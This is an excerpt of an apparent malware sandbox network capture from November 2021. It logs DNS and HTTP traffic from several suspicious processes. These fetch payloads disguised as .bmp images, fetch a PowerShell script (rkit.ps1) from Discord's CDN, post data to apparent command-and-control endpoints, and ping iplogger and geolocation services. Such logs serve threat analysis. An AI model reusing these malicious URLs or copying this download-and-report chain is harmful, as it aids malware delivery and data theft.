      Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT
      ETag: "13-5cff5b943f0c1"
      Accept-Ranges: bytes
      Content-Length: 19
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/plain
    • flag-ru
      GET
      http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
      md9_1sjm.exe
      Remote address:
      186.2.171.3:80
      Request
      GET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
      Accept-Language: en-US,en;q=0.9
      Referer: https://www.facebook.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
      Host: 186.2.171.3
      Response
      HTTP/1.1 200 OK
      Server: ddos-guard
      Connection: keep-alive
      Keep-Alive: timeout=60
      Set-Cookie: __ddg1=X0aBjN8Wn60Cos7m0ume; Domain=.171.3; HttpOnly; Path=/; Expires=Wed, 09-Nov-2022 13:23:04 GMT
      Date: Tue, 09 Nov 2021 13:22:15 GMT
      Upgrade: h2
      Vary: Accept-Encoding
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
    • flag-us
      DNS
      iplogger.org
      IEXPLORE.EXE
      Remote address:
      8.8.8.8:53
      Request
      iplogger.org
      IN A
      Response
      iplogger.org
      IN A
      88.99.66.31
    • flag-nl
      GET
      http://212.192.241.15/base/api/statistics.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      GET /base/api/statistics.php HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:04 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 94
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-de
      GET
      https://iplogger.org/Zm8g4
      md9_1sjm.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /Zm8g4 HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
      Accept-Language: en-US,en;q=0.9
      Referer: https://www.facebook.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
      Host: iplogger.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:09 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=ann91dcq03hi9idum3nkgh8mc4; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242584002; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers:
      whoami: 5f6f374a2d0823068d51889a32317054977c188115fe1c6b1b8e036330756be6
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-us
      DNS
      ip-api.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/
      Files.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      Connection: Keep-Alive
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      viewport-width: 1920
      Host: ip-api.com
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:07 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 323
      Access-Control-Allow-Origin: *
      X-Ttl: 46
      X-Rl: 43
    • flag-us
      DNS
      toa.mygametoa.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      toa.mygametoa.com
      IN A
      Response
      toa.mygametoa.com
      IN A
      34.64.183.91
    • flag-us
      DNS
      toa.mygametoa.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      toa.mygametoa.com
      IN AAAA
      Response
    • flag-us
      DNS
      cdn.discordapp.com
      Graphicss.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.134.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.133.233
      cdn.discordapp.com
      IN A
      162.159.129.233
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp
      File.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/891021838312931420/906790845167063140/PL_Client.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: cdn.discordapp.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Content-Type: image/x-ms-bmp
      Content-Length: 1335812
      Connection: keep-alive
      CF-Ray: 6ab75aab19f94c8b-AMS
      Accept-Ranges: bytes
      Age: 197948
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment;%20filename=PL_Client.bmp
      ETag: "74ad528eb7a59567e745fd4894f2d458"
      Expires: Wed, 09 Nov 2022 13:23:11 GMT
      Last-Modified: Sun, 07 Nov 2021 06:23:04 GMT
      Vary: Accept-Encoding
      CF-Cache-Status: HIT
      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      x-goog-generation: 1636266184911820
      x-goog-hash: crc32c=VMZwDw==
      x-goog-hash: md5=dK1SjrellWfnRf1IlPLUWA==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 1335812
      X-GUploader-UploadID: ADPycdt53Xx1HiS_dTrBpGZARlg4NWMItAXIjW_xFv9_aKjRdZRYHyX-R2L0P2V2f-2nRChjGV9KdKytseI2a1xSU1Y
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8j9cwE9bhL4LvgMAx%2Be1Ji%2BJLqFYOzBFNvIHecSye5USjjRb2yxHbFk%2FMxOiXW2CeLHbNFT92fWmOfozNSN6Pyb83G2OVfwTEAogqlt3WxxoqYY29hzQtCnnm7foRmTwXuKCg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
    • flag-us
      DNS
      staticimg.youtuuee.com
      Files.exe
      Remote address:
      8.8.8.8:53
      Request
      staticimg.youtuuee.com
      IN A
      Response
      staticimg.youtuuee.com
      IN A
      45.136.151.102
    • flag-us
      GET
      http://staticimg.youtuuee.com/api/fbtime
      Files.exe
      Remote address:
      45.136.151.102:80
      Request
      GET /api/fbtime HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      Host: staticimg.youtuuee.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.21
    • flag-us
      POST
      http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05
      Files.exe
      Remote address:
      45.136.151.102:80
      Request
      POST /api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05 HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      Content-Length: 294
      Host: staticimg.youtuuee.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.21
    • flag-us
      DNS
      ipinfo.io
      File.exe
      Remote address:
      8.8.8.8:53
      Request
      ipinfo.io
      IN A
      Response
      ipinfo.io
      IN A
      34.117.59.81
    • flag-us
      GET
      https://ipinfo.io/widget
      File.exe
      Remote address:
      34.117.59.81:443
      Request
      GET /widget HTTP/1.1
      Connection: Keep-Alive
      Referer: https://ipinfo.io/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: ipinfo.io
      Response
      HTTP/1.1 200 OK
      access-control-allow-origin: *
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-type: application/json; charset=utf-8
      content-length: 893
      date: Tue, 09 Nov 2021 13:23:11 GMT
      x-envoy-upstream-service-time: 32
      vary: Accept-Encoding
      Via: 1.1 google
      Alt-Svc: clear
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1
      Graphicss.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/523238636561629190/894846882596126762/rkit.ps1 HTTP/1.1
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Content-Type: text/plain;%20charset=utf-8
      Content-Length: 6117
      Connection: keep-alive
      CF-Ray: 6ab75aaf9f1a4c4f-AMS
      Accept-Ranges: bytes
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment;%20filename=rkit.ps1
      ETag: "71f45dee42b2fb64e82d68b7d4575ea6"
      Expires: Wed, 09 Nov 2022 13:23:12 GMT
      Last-Modified: Tue, 05 Oct 2021 07:22:02 GMT
      Vary: Accept-Encoding
      CF-Cache-Status: MISS
      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      x-goog-generation: 1633418522320185
      x-goog-hash: crc32c=+eg+Lg==
      x-goog-hash: md5=cfRd7kKy+2ToLWi31Fdepg==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 6117
      X-GUploader-UploadID: ADPycdt1grvJB7pGxdlnNxiMK7kIRQ5Xj7XW2grhkwc_tDDP3f4ggV3g6N2K3dYssYfD2-kq_nvyowAkM611w0MSC4Q
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QParheVoV3HI6cMfTz4E%2FH3rU8TciRcJyL62xLVxV97Xbjz2NJfRt%2BRdO%2F%2FXRhzZzoG2ikd02KsBUgA7OiCO0SqcUj44GxeRn59zY8XMxmS5mTIJHm%2FuPvGzjPkLvFqssIRhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
    • flag-us
      DNS
      topniemannpickshop.cc
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      topniemannpickshop.cc
      IN A
      Response
    • flag-us
      DNS
      niemannbest.me
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      niemannbest.me
      IN A
      Response
      niemannbest.me
      IN A
      104.21.51.48
      niemannbest.me
      IN A
      172.67.221.103
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 1905
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 108
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 133
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 108
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-us
      GET
      https://niemannbest.me/?username=seo1
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo1 HTTP/1.1
      Host: niemannbest.me
      Connection: Keep-Alive
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:23:43 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fY5cXUBP04tkcZxruGfxXel7loYlVlv2ajIMFuWBLOM%2FBK3t3tYwTJN6lM4rp0hb6DrXm%2BcsccPIw2pgb6OxptyeTumwyFUkM0fK4d5QfNRsZtrMeJBqmqzruxM3ZTG%2FaA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75ab1b8550c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo2
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo2 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:24:17 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5tpkNtE71HjUvurojmVBZmU9BKcEeiyXXm6sgT98lU5vjFs7uX5AG2At5xWp82irVKSxZvqZj6Dvmdqh0dZNS%2FNrh3wNy8zpe%2BbrjHQnB5GuialxM9F9wpKaYae7ZbQjFg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b86d80f0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo3
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo3 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:24:48 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lmDNFA5VPUfknqQlZCGXj9iyBtnvswKb28G3IDmXUjF8vIZMh6S9eRHD7vWPJIIoRe%2FhZATpFDno2nXmABgRNWTPE7y3gE5z%2BYTIHyQrwpGbM%2FN8tLfGkGkb8NYWoFJ2wg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75c481e0f0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo4
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo4 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:25:19 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GM0YjSA3ditOYMEbqpiHMCsdCJwu9yMmAe8zDKJNUxHKd1Uvb3In1jwNNHVFhmDpmnftuVq7cQYevcB1PxMpWFIh6JT46K8MCvMpSgeGrajG%2BTqCjynGsl5tCcVWPK1aPg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75d0b5a6a0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo5
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo5 HTTP/1.1
      Host: niemannbest.me
    • flag-nl
      HEAD
      http://45.133.1.107/download/NiceProcessX64.bmp
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      HEAD /download/NiceProcessX64.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: 45.133.1.107
      Content-Length: 0
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
      ETag: "4fa00-5cbb9fe84ddf3"
      Accept-Ranges: bytes
      Content-Length: 326144
      Content-Type: image/x-ms-bmp
    • flag-nl
      GET
      http://45.133.1.107/download/NiceProcessX64.bmp
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      GET /download/NiceProcessX64.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: 45.133.1.107
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
      ETag: "4fa00-5cbb9fe84ddf3"
      Accept-Ranges: bytes
      Content-Length: 326144
      Content-Type: image/x-ms-bmp
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 133
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:18 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 5504
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:33 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 20
      X-Rl: 27
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 7
      X-Rl: 22
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 6
      X-Rl: 21
    • flag-us
      DNS
      bh.mygameadmin.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      bh.mygameadmin.com
      IN A
      Response
      bh.mygameadmin.com
      IN A
      172.67.213.194
      bh.mygameadmin.com
      IN A
      104.21.75.46
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 274
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jvh91JTyTvm5DrLh8Ws0QBi7vb4gWYwxqhtFtwAWHD%2BqL5FuyCgK7V4hlzglMlyAfjZUY84ALKsO%2FHv5aSbdUEk6enpdPV9yLYRJvEz9QklzaOEuyYfCRCNuWVgbVGV50g7pSxA%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b878898417a-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-de
      GET
      https://iplogger.org/1h49r7
      IEXPLORE.EXE
      Remote address:
      88.99.66.31:443
      Request
      GET /1h49r7 HTTP/1.1
      Accept: text/html, application/xhtml+xml, */*
      Accept-Language: en-US
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Accept-Encoding: gzip, deflate
      Host: iplogger.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=td224ltvuq1hlg0c5vubj5s5p5; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242583965; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers:
      whoami: b67ec23f4466f7452c81aed606c852615f0ddbae2755f3228dc6f5a050c1e8fd
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-de
      GET
      https://iplogger.org/favicon.ico
      IEXPLORE.EXE
      Remote address:
      88.99.66.31:443
      Request
      GET /favicon.ico HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: iplogger.org
      Connection: Keep-Alive
      Cookie: PHPSESSID=td224ltvuq1hlg0c5vubj5s5p5; clhf03028ja=154.61.71.51
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: image/x-icon
      Content-Length: 16446
      Last-Modified: Wed, 17 Mar 2021 07:14:34 GMT
      Connection: keep-alive
      ETag: "6051ac5a-403e"
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Cache-Control: no-cache
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
      Accept-Ranges: bytes
    • flag-us
      DNS
      www.microsoft.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      104.85.1.163
    • flag-us
      DNS
      all-mobile-pa1ments.com.mx
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      all-mobile-pa1ments.com.mx
      IN A
      Response
    • flag-us
      DNS
      buy-fantasy-football.com.sg
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      buy-fantasy-football.com.sg
      IN A
      Response
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 274
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
